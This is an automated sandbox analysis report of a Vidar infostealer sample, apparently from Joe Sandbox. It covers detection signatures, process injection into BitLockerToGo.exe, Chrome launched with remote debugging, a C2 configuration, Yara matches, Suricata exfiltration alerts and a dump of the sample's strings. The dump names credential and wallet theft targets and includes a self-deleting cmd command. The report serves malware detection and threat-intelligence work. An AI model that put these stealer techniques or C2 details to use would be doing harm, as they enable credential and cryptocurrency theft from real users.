Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe

Overview

General Information

Sample name:SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe
Analysis ID:1615993
MD5:b8930ce311970e82b7b52dbfa4d81187
SHA1:7aaf10c720b8cfd1b9daa0174de934a9fa31f410
SHA256:4f6f1b2e6fc03473bf5d66cca5013f5ed5a96df2ac46b38e525ee733d230cf88
Tags:exeuser-SecuriteInfoCom
Infos:

Detection

Vidar
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Attempt to bypass Chrome Application-Bound Encryption
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Vidar stealer
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Performs DNS queries to domains with low reputation
Searches for specific processes (likely to inject)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Browser Started with Remote Debugging
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe (PID: 6652 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe" MD5: B8930CE311970E82B7B52DBFA4D81187)
    • BitLockerToGo.exe (PID: 2380 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)
      • chrome.exe (PID: 2352 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • chrome.exe (PID: 4112 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2888 --field-trial-handle=2712,i,1009014025995449760,7047776707650769861,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": "https://steamcommunity.com/profiles/76561199825403037", "Botnet": "oomaino5"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2206109646.000000000A396000.00000004.00001000.00020000.00000000.sdmpMsfpayloads_msf_9Metasploit Payloads - file msf.war - contentsFlorian Roth
    • 0x0:$x1: 4d5a9000030000000
    00000000.00000003.2202609846.000000000A46A000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
      00000000.00000002.2206546529.000000000A47A000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
        00000000.00000002.2206546529.000000000A47A000.00000004.00001000.00020000.00000000.sdmpinfostealer_win_vidar_strings_nov23Finds Vidar samples based on the specific stringsSekoia.io
        • 0x19f7f:$str01: MachineID:
        • 0x18f4f:$str02: Work Dir: In memory
        • 0x1a027:$str03: [Hardware]
        • 0x19f68:$str04: VideoCard:
        • 0x196c0:$str05: [Processes]
        • 0x196cc:$str06: [Software]
        • 0x18fe0:$str07: information.txt
        • 0x19cbc:$str08: %s\*
        • 0x19d09:$str08: %s\*
        • 0x191fd:$str11: Software\Martin Prikryl\WinSCP 2\Configuration
        • 0x19592:$str12: UseMasterPassword
        • 0x1a033:$str13: Soft: WinSCP
        • 0x19a6b:$str14: <Pass encoding="base64">
        • 0x1a016:$str15: Soft: FileZilla
        • 0x18fd2:$str16: passwords.txt
        • 0x195bd:$str17: build_id
        • 0x19684:$str18: file_data
        00000004.00000002.3074742779.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
          Click to see the 12 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe.a280000.4.unpackinfostealer_win_vidar_strings_nov23Finds Vidar samples based on the specific stringsSekoia.io
          • 0x1917f:$str01: MachineID:
          • 0x19227:$str03: [Hardware]
          • 0x19168:$str04: VideoCard:
          • 0x188c0:$str05: [Processes]
          • 0x188cc:$str06: [Software]
          • 0x18ebc:$str08: %s\*
          • 0x18f09:$str08: %s\*
          • 0x183fd:$str11: Software\Martin Prikryl\WinSCP 2\Configuration
          • 0x18792:$str12: UseMasterPassword
          • 0x19233:$str13: Soft: WinSCP
          • 0x18c6b:$str14: <Pass encoding="base64">
          • 0x19216:$str15: Soft: FileZilla
          • 0x187bd:$str17: build_id
          • 0x18884:$str18: file_data
          0.2.SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe.a47a000.6.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
            0.2.SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe.a47a000.6.raw.unpackinfostealer_win_vidar_strings_nov23Finds Vidar samples based on the specific stringsSekoia.io
            • 0x19f7f:$str01: MachineID:
            • 0x18f4f:$str02: Work Dir: In memory
            • 0x1a027:$str03: [Hardware]
            • 0x19f68:$str04: VideoCard:
            • 0x196c0:$str05: [Processes]
            • 0x196cc:$str06: [Software]
            • 0x18fe0:$str07: information.txt
            • 0x19cbc:$str08: %s\*
            • 0x19d09:$str08: %s\*
            • 0x191fd:$str11: Software\Martin Prikryl\WinSCP 2\Configuration
            • 0x19592:$str12: UseMasterPassword
            • 0x1a033:$str13: Soft: WinSCP
            • 0x19a6b:$str14: <Pass encoding="base64">
            • 0x1a016:$str15: Soft: FileZilla
            • 0x18fd2:$str16: passwords.txt
            • 0x195bd:$str17: build_id
            • 0x19684:$str18: file_data
            0.2.SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe.a2c0000.2.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
              0.2.SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe.a2c0000.2.raw.unpackinfostealer_win_vidar_strings_nov23Finds Vidar samples based on the specific stringsSekoia.io
              • 0x19f7f:$str01: MachineID:
              • 0x18f4f:$str02: Work Dir: In memory
              • 0x1a027:$str03: [Hardware]
              • 0x19f68:$str04: VideoCard:
              • 0x196c0:$str05: [Processes]
              • 0x196cc:$str06: [Software]
              • 0x18fe0:$str07: information.txt
              • 0x19cbc:$str08: %s\*
              • 0x19d09:$str08: %s\*
              • 0x191fd:$str11: Software\Martin Prikryl\WinSCP 2\Configuration
              • 0x19592:$str12: UseMasterPassword
              • 0x1a033:$str13: Soft: WinSCP
              • 0x19a6b:$str14: <Pass encoding="base64">
              • 0x1a016:$str15: Soft: FileZilla
              • 0x18fd2:$str16: passwords.txt
              • 0x195bd:$str17: build_id
              • 0x19684:$str18: file_data
              Click to see the 14 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Browser Started with Remote Debugging
              Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe", ParentImage: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, ParentProcessId: 2380, ParentProcessName: BitLockerToGo.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 2352, ProcessName: chrome.exe

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-02-15T23:26:52.450158+010020287653Unknown Traffic192.168.2.44973777.239.117.222443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-02-15T23:26:58.945593+010020442471Malware Command and Control Activity Detected88.99.124.230443192.168.2.449931TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-02-15T23:27:00.259341+010020518311Malware Command and Control Activity Detected88.99.124.230443192.168.2.449941TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-02-15T23:26:57.354777+010020490871A Network Trojan was detected192.168.2.44992088.99.124.230443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-02-15T23:27:02.638577+010020593311Malware Command and Control Activity Detected192.168.2.44995288.99.124.230443TCP
              2025-02-15T23:27:03.483075+010020593311Malware Command and Control Activity Detected192.168.2.44995888.99.124.230443TCP
              2025-02-15T23:27:11.023301+010020593311Malware Command and Control Activity Detected192.168.2.45001688.99.124.230443TCP
              2025-02-15T23:27:11.334322+010020593311Malware Command and Control Activity Detected192.168.2.45002888.99.124.230443TCP
              2025-02-15T23:27:12.336013+010020593311Malware Command and Control Activity Detected192.168.2.45003588.99.124.230443TCP
              2025-02-15T23:27:13.513684+010020593311Malware Command and Control Activity Detected192.168.2.45003788.99.124.230443TCP
              2025-02-15T23:27:15.365996+010020593311Malware Command and Control Activity Detected192.168.2.45003888.99.124.230443TCP
              2025-02-15T23:27:15.577797+010020593311Malware Command and Control Activity Detected192.168.2.45003988.99.124.230443TCP
              2025-02-15T23:27:16.646538+010020593311Malware Command and Control Activity Detected192.168.2.45004088.99.124.230443TCP
              2025-02-15T23:27:17.633352+010020593311Malware Command and Control Activity Detected192.168.2.45004188.99.124.230443TCP
              2025-02-15T23:27:18.644990+010020593311Malware Command and Control Activity Detected192.168.2.45004288.99.124.230443TCP
              2025-02-15T23:27:19.657589+010020593311Malware Command and Control Activity Detected192.168.2.45004388.99.124.230443TCP
              2025-02-15T23:27:21.760210+010020593311Malware Command and Control Activity Detected192.168.2.45004488.99.124.230443TCP
              2025-02-15T23:27:42.582066+010020593311Malware Command and Control Activity Detected192.168.2.45004788.99.124.230443TCP
              2025-02-15T23:27:43.471871+010020593311Malware Command and Control Activity Detected192.168.2.45004888.99.124.230443TCP
              2025-02-15T23:27:44.469066+010020593311Malware Command and Control Activity Detected192.168.2.45004988.99.124.230443TCP
              2025-02-15T23:27:45.492823+010020593311Malware Command and Control Activity Detected192.168.2.45005088.99.124.230443TCP
              2025-02-15T23:27:46.509549+010020593311Malware Command and Control Activity Detected192.168.2.45005188.99.124.230443TCP
              2025-02-15T23:27:47.875168+010020593311Malware Command and Control Activity Detected192.168.2.45005288.99.124.230443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-02-15T23:27:11.334322+010028596361Malware Command and Control Activity Detected192.168.2.45002888.99.124.230443TCP
              2025-02-15T23:27:12.336013+010028596361Malware Command and Control Activity Detected192.168.2.45003588.99.124.230443TCP
              2025-02-15T23:27:13.513684+010028596361Malware Command and Control Activity Detected192.168.2.45003788.99.124.230443TCP
              2025-02-15T23:27:15.577797+010028596361Malware Command and Control Activity Detected192.168.2.45003988.99.124.230443TCP
              2025-02-15T23:27:16.646538+010028596361Malware Command and Control Activity Detected192.168.2.45004088.99.124.230443TCP
              2025-02-15T23:27:17.633352+010028596361Malware Command and Control Activity Detected192.168.2.45004188.99.124.230443TCP
              2025-02-15T23:27:18.644990+010028596361Malware Command and Control Activity Detected192.168.2.45004288.99.124.230443TCP
              2025-02-15T23:27:19.657589+010028596361Malware Command and Control Activity Detected192.168.2.45004388.99.124.230443TCP
              2025-02-15T23:27:21.760210+010028596361Malware Command and Control Activity Detected192.168.2.45004488.99.124.230443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-02-15T23:26:56.053025+010028593781Malware Command and Control Activity Detected192.168.2.44991088.99.124.230443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: SecuriteInfo.com.Win32.Malware-gen.26093.20806.exeAvira: detected
              Found malware configuration
              Source: 00000000.00000003.2202609846.000000000A46A000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199825403037", "Botnet": "oomaino5"}
              Multi AV Scanner detection for submitted file
              Source: SecuriteInfo.com.Win32.Malware-gen.26093.20806.exeVirustotal: Detection: 32%Perma Link
              Source: SecuriteInfo.com.Win32.Malware-gen.26093.20806.exeReversingLabs: Detection: 35%
              Joe Sandbox ML detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00405FE7 CryptUnprotectData,LocalAlloc,LocalFree,4_2_00405FE7
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0040E7E9 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,GetLastError,GetProcessHeap,HeapFree,4_2_0040E7E9
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00406062 BCryptCloseAlgorithmProvider,BCryptDestroyKey,4_2_00406062
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0040627F LocalAlloc,BCryptDecrypt,4_2_0040627F
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0040609C BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey,4_2_0040609C
              Source: SecuriteInfo.com.Win32.Malware-gen.26093.20806.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
              Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49893 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 88.99.124.230:443 -> 192.168.2.4:49902 version: TLS 1.2
              Source: SecuriteInfo.com.Win32.Malware-gen.26093.20806.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: A{"id":1,"method":"Storage.getCookies"}|.tgz.gzSecurityHistoryWork Dir: In memorySOFTWARE\Microsoft\Cryptographyfirefox%08lX%04lX%lu_key.txtSoft\Steam\steam_tokens.txt\Discord\tokens.txtpasswords.txtinformation.txtlocalhostWebSocketClient" & exitGdipGetImageHeightSoftGdipGetImagePixelFormatN0ZWFt\Monero\wallet.keysAzure\.awsstatusWallets_CreateProcessGdipGetImageEncodershttpsSoftware\Martin Prikryl\WinSCP 2\SessionsPlugins/devtoolsprefs.jsLocal Extension SettingsSync Extension SettingsFilescookiesCookies\BraveWallet\Preferenceskey_datas%s\%s\%sPortNumberCurrentBuildNumberGdiplusStartup.zipGdipCreateHBITMAPFromBitmapOpera Crypto.zooUnknownGdiplusShutdown/json_logins.jsoninvalid string positionSoftware\Martin Prikryl\WinSCP 2\ConfigurationDisplayVersionSOFTWARE\Microsoft\Windows NT\CurrentVersionopentokenamcommunity.comTelegramSoftware\Valve\SteamGdipSaveImageToStreamGdipLoadImageFromStream\AppData\Roaming\FileZilla\recentservers.xml.dllSOFTWARE\Microsoft\Windows\CurrentVersion\Uninstallapprove_aprilNetworkblock.arjprofiles.ini.lzhGdipGetImageWidthwallet_pathSteamPathscreenshot.jpgstring too longvector<T> too longProcessorNameStringloginusers.vdflibraryfolders.vdfconfig.vdfDialogConfig.vdfDialogConfigOverlay*.vdfGdipGetImageEncodersSizesteam.exeC:\Windows\system32\cmd.exeC:\Windows\system32\rundll32.exeBravetrueformhistory.sqlitecookies.sqliteplaces.sqliteLocal StatefalseAzure\.azureSOFTWARE\monero-project\monero-corechromefile_nameDisplayNameHostNameProductNameUserNameGdipSaveImageToFilemsal.cacheGdipDisposeImagemodeAzure\.IdentityServiceUseMasterPasswordhwidMachineGuidtask_idbuild_idCrash DetectedDisabled%dx%d%d/%d/%d %d:%d:%d.arcvdr1.pdb\Local Storage\leveldb_0.indexeddb.leveldb_formhistory.db_history.db_cookies.db_passwords.db_webdata.db_key4.db\key4.dbfile_dataLogin DataWeb DataoperaOperachrome-extension_[Processes][Software]\storage\default\\.aws\errors\\Telegram Desktop\\Steam\\config\\.azure\ Stable\\.IdentityService\\discord\/c timeout /t 10 & rd /s /q "C:\ProgramData\" & rd /s /q "C:\ProgramData\\..\.ZDISPLAYOpera GXEXCEPTION_INT_OVERFLOWEXCEPTION_FLT_OVERFLOWEXCEPTION_STACK_OVERFLOWEXCEPTION_FLT_UNDERFLOWPOSTEXCEPTION_BREAKPOINT\Local Storage\leveldb\CURRENTEXCEPTION_DATATYPE_MISALIGNMENTEXCEPTION_FLT_INEXACT_RESULTGETEXCEPTION_IN_PAGE_ERRORdQw4w9WgXcQEXCEPTION_SINGLE_STEPGdipCreateBitmapFromHBITMAPEXCEPTION_INT_DIVIDE_BY_ZEROEXCEPTION_FLT_DIVIDE_BY_ZEROEXCEPTION_NONCONTINUABLE_EXCEPTIONUNKNOWN EXCEPTIONEXCEPTION_INVALID_DISPOSITIONEXCEPTION_PRIV_INSTRUCTIONEXCEPTION_ILLEGAL_INSTRUCTIONEXCEPTION_FLT_INVALID_OPERATIONEXCEPTION_ACCESS_VIOLATIONEXCEPTION_FLT_STACK_CHECKEXCEPTION_FLT_DENORMAL_OPERANDEXCEPTION_ARRAY_BOUNDS_EXCEEDED%d MBIndexedDBOCALAPPDATA?<Host><Port><User><Pass encoding="base64">http://localhost:"webSocketDebuggerUrl":6^userContextId=4294967295465 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73ws://localhost:9223.metadata-v2comctl32gdi32:225121Windows 11HTTP/1.1HARDWARE\DESCRIPTION\System\CentralProcessor\0abcdefgh
              Source: Binary string: C:\Users\Administrator\Desktop\vdr1\Release\vdr1.pdbA source: SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe, 00000000.00000003.2202609846.000000000A46A000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe, 00000000.00000002.2206546529.000000000A47A000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe, 00000000.00000002.2205879339.000000000A1B2000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.3074742779.0000000000400000.00000040.00000400.00020000.00000000.sdmp
              Source: Binary string: vdr1.pdb source: SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe, 00000000.00000003.2202609846.000000000A46A000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe, 00000000.00000002.2206546529.000000000A47A000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe, 00000000.00000002.2205879339.000000000A1B2000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, BitLockerToGo.exe, 00000004.00000002.3074742779.0000000000400000.00000040.00000400.00020000.00000000.sdmp
              Source: Binary string: BitLockerToGo.pdb source: SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe, 00000000.00000002.2206109646.000000000A35C000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: cryptosetup.pdbGCTL source: BitLockerToGo.exe, 00000004.00000002.3075645700.0000000002DD7000.00000004.00000020.00020000.00000000.sdmp, ctr1d2.4.dr
              Source: Binary string: cryptosetup.pdb source: BitLockerToGo.exe, 00000004.00000002.3075645700.0000000002DD7000.00000004.00000020.00020000.00000000.sdmp, ctr1d2.4.dr
              Source: Binary string: BitLockerToGo.pdbGCTL source: SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe, 00000000.00000002.2206109646.000000000A35C000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: C:\Users\Administrator\Desktop\vdr1\Release\vdr1.pdb source: SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe, 00000000.00000003.2202609846.000000000A46A000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe, 00000000.00000002.2206546529.000000000A47A000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe, 00000000.00000002.2205879339.000000000A1B2000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, BitLockerToGo.exe, 00000004.00000002.3074742779.0000000000400000.00000040.00000400.00020000.00000000.sdmp
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00407891 FindFirstFileA,CopyFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,FindNextFileA,FindClose,4_2_00407891
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0040A69C FindFirstFileA,StrCmpCA,CopyFileA,Sleep,DeleteFileA,FindNextFileA,FindClose,4_2_0040A69C
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00408776 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,4_2_00408776
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004013DA FindFirstFileA,FindNextFileA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindNextFileA,FindClose,4_2_004013DA
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00406784 ExpandEnvironmentStringsA,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,StrCmpCA,CopyFileA,CopyFileA,Sleep,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,4_2_00406784
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00411187 wsprintfA,FindFirstFileA,memset,memset,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcatA,strtok_s,SymMatchString,strtok_s,memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,4_2_00411187
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00412A5D wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_00412A5D
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00409C78 wsprintfA,FindFirstFileA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,4_2_00409C78
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00408224 FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_00408224
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00413B10 SHGetFolderPathA,wsprintfA,FindFirstFileA,FindNextFileA,strcpy,_splitpath,strcpy,strlen,isupper,wsprintfA,strcpy,strlen,SHFileOperationA,FindNextFileA,FindNextFileA,FindClose,4_2_00413B10
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00412539 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrcatA,lstrlenA,lstrlenA,4_2_00412539
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00411BD2 wsprintfA,FindFirstFileA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,4_2_00411BD2
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00411722 SymMatchString,SymMatchString,SymMatchString,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,4_2_00411722
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
              Source: chrome.exeMemory has grown: Private usage: 6MB later: 40MB

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.4:49910 -> 88.99.124.230:443
              Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:50038 -> 88.99.124.230:443
              Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:50028 -> 88.99.124.230:443
              Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:50035 -> 88.99.124.230:443
              Source: Network trafficSuricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:50035 -> 88.99.124.230:443
              Source: Network trafficSuricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:50028 -> 88.99.124.230:443
              Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.4:49920 -> 88.99.124.230:443
              Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:49958 -> 88.99.124.230:443
              Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:50016 -> 88.99.124.230:443
